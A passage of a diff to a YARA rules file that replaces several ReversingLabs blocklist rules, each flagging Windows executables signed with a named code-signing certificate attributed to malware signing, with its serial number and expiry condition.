1601596800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "1bc9d36c-381e-5359-bba4-8dd870ed9267" + id = "6f9852cb-277d-5942-b3f7-525593a41027" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11364-L11382" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5386-L5402" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58" score = 75 quality = 90 tags = "INFO, FILE" @@ -16012,22 +35803,22 @@ rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VThink Software Consulting Inc." and (pe.signatures[i].serial=="00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures[i].serial=="8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0") and 1599177600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Master Networking s.r.o." and pe.signatures[i].serial=="5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d251afda-7582-5a00-a100-fd3acff2f995" + id = "e1dd9783-078f-582e-8493-7c493cda9c62" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11384-L11400" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5404-L5422" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3" score = 75 quality = 90 tags = "INFO, FILE" @@ -16037,22 +35828,22 @@ rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Elite Marketing Strategies, Inc." and pe.signatures[i].serial=="33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MC Commerce SP Z o o" and (pe.signatures[i].serial=="00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures[i].serial=="b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db") and 1585785600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e7cdf040-3fe2-55ed-8f66-702fb4455653" + id = "96219c86-f463-5f11-950d-ca2af75d5559" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11402-L11420" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5424-L5442" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5" score = 75 quality = 90 tags = "INFO, FILE" @@ -16062,22 +35853,22 @@ rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BISOYETUTU LTD LIMITED" and (pe.signatures[i].serial=="00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures[i].serial=="e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f") and 1617062400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MEHANIKUM OOO" and (pe.signatures[i].serial=="00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures[i].serial=="f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0") and 1599031121<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b3978831-57d6-5f25-a271-fa4f449d37b3" + id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11422-L11440" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5444-L5462" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e" score = 75 quality = 90 tags = "INFO, FILE" @@ -16087,22 +35878,22 @@ rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Al-Faris group d.o.o." and (pe.signatures[i].serial=="00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures[i].serial=="c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97") and 1616371200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Milsean Software Limited" and (pe.signatures[i].serial=="00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures[i].serial=="fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7") and 1599523200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0" + id = "116beeac-49c6-56b0-a1c0-855623f604d9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11442-L11458" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5464-L5480" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6" score = 75 quality = 90 tags = "INFO, FILE" @@ -16112,22 +35903,22 @@ rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Storeks LLC" and pe.signatures[i].serial=="1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "NEEDCODE SP Z O O" and pe.signatures[i].serial=="0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea" + id = "7c427b1a-fbe9-5e97-9810-87863c70988d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11460-L11476" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5482-L5498" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96" score = 75 quality = 90 tags = "INFO, FILE" @@ -16137,22 +35928,22 @@ rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures[i].serial=="0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OLIMP STROI, OOO" and pe.signatures[i].serial=="69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "3bac20a3-1415-53af-9d04-a30aa7488dd7" + id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11478-L11496" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5500-L5518" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18" score = 75 quality = 90 tags = "INFO, FILE" @@ -16162,22 +35953,22 @@ rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BS TEHNIK d.o.o." and (pe.signatures[i].serial=="00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" or pe.signatures[i].serial=="f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00") and 1606953600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OM-FAS d.o.o." and (pe.signatures[i].serial=="00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures[i].serial=="fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2") and 1575590400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "fd1b83aa-bfcc-590c-8f97-875badf09698" + id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11498-L11514" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9ec7e84c77583bd52ccfb8d6d5831f3634ed0a401d8103376c4775b7f2c43d81" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5520-L5538" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24" score = 75 quality = 90 tags = "INFO, FILE" @@ -16187,22 +35978,22 @@ rule REVERSINGLABS_Cert_Blocklist_4728189Fa0F57793484Cdf764F5E283D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Power Save Systems s.r.o." and pe.signatures[i].serial=="47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" and 1647302400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO GARANT" and (pe.signatures[i].serial=="00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or pe.signatures[i].serial=="c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d") and 1588679105<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "727167de-5678-558d-b948-8a40839d0500" + id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11516-L11534" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "e275a1fd2eb931030fa8b5fc11cd1b335835aaa553a42455053cb93fef5e6e72" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5540-L5558" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f" score = 75 quality = 90 tags = "INFO, FILE" @@ -16212,22 +36003,22 @@ rule REVERSINGLABS_Cert_Blocklist_9Bd81A9Adaf71F1Ff081C1F4A05D7Fd7 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SMART TOYS AND GAMES, INC" and (pe.signatures[i].serial=="00:9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7" or pe.signatures[i].serial=="9b:d8:1a:9a:da:f7:1f:1f:f0:81:c1:f4:a0:5d:7f:d7") and 1601683200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO T2 Soft" and (pe.signatures[i].serial=="00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures[i].serial=="d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d") and 1588679107<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "0a196a18-002e-58e4-bff2-83d1a67a82ce" + id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11536-L11554" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2a9f13f5e79a12f7e9d9d4a0dcaac065e1fc5167c67bc9f3fd7ba1c374b26d96" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5560-L5578" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b" score = 75 quality = 90 tags = "INFO, FILE" @@ -16237,22 +36028,22 @@ rule REVERSINGLABS_Cert_Blocklist_C81319D20C6F1F1Aec3398522189D90C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "AMCERT,LLC" and (pe.signatures[i].serial=="00:c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" or pe.signatures[i].serial=="c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c") and 1643500800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PARTS-JEST d.o.o." and (pe.signatures[i].serial=="00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures[i].serial=="b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3") and 1600172855<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c6e93547-5be0-5303-b537-655db3d78ad4" + id = "3912fdfc-7a84-51ce-abd2-977ad183af26" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11556-L11574" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "691b57929c93d14f8700e0e61170b9248499fd36b80aec90f2054c32d6a3a9eb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5580-L5596" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8" score = 75 quality = 90 tags = "INFO, FILE" @@ -16262,22 +36053,22 @@ rule REVERSINGLABS_Cert_Blocklist_C318D876768258A696Ab9Dd825E27Acd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Genezis" and (pe.signatures[i].serial=="00:c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd" or pe.signatures[i].serial=="c3:18:d8:76:76:82:58:a6:96:ab:9d:d8:25:e2:7a:cd") and 1615161600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REGION TOURISM LLC" and pe.signatures[i].serial=="5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "a61e61c1-9fa0-5fd9-b197-bb9d1b68c8f4" + id = "0165920f-5f4d-5b35-990d-120786b4c5ba" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11576-L11592" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5f151ee5781a15cca4394fdd8200162eae47e9d088a0b1551c9ed22ce11473a2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5598-L5614" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4" score = 75 quality = 90 tags = "INFO, FILE" @@ -16287,22 +36078,22 @@ rule REVERSINGLABS_Cert_Blocklist_06Df5C318759D6Ea9D090Bfb2Faf1D94 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SpiffyTech Inc." and pe.signatures[i].serial=="06:df:5c:31:87:59:d6:ea:9d:09:0b:fb:2f:af:1d:94" and 1634515201<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Retalit LLC" and pe.signatures[i].serial=="08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2a15d527-7f42-5c56-9740-9c2503a66f4f" + id = "4b5abcfe-259e-5029-822b-c191b8d2c607" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11594-L11610" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "40b78005d343684d08bb93e92c51eee10e674e8deb9eec290bc9ffe3b23061b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L5616-L5634" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f" score = 75 quality = 90 tags = "INFO, FILE" @@ -16312,22 +36103,22 @@ rule REVERSINGLABS_Cert_Blocklist_02De1Cc6C487954592F1Bf574Ca2B000 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Orca System" and pe.signatures[i].serial=="02:de:1c:c6:c4:87:95:45:92:f1:bf:57:4c:a2:b0:00" and 1613735394<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SCABONE PTY LTD" and (pe.signatures[i].serial=="00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures[i].serial=="b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0") and 1572566400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A32B8B4F1Be43C23Eb2848Ab4Ef06Bb2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2ced71bb-622c-5597-91c3-210b9b5f3a4e" + id = "cc147c06-e0cf-5536-be3c-17e838b346a9" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L11612-L11630" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dd7d44349baaf4a2e2f61b38cef31f288110bb03944fd4593f52a0ab03b9d172" + source_url = 